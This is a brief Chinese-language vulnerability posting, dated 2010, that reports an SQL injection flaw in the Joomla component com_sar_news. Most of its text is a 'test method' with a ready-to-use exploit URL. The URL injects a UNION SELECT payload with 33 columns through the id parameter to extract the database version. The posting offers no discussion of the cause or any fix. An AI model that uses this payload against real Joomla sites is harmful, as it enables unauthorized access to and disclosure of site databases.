Joomla com_sar_news SQL注入漏洞
来源:岁月联盟
时间:2010-06-06
测试方法:
LyNx
http://syue.com/index.php?option=com_sar_news&id=80[SQL]&sort_by=ordering http://syue.com/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering |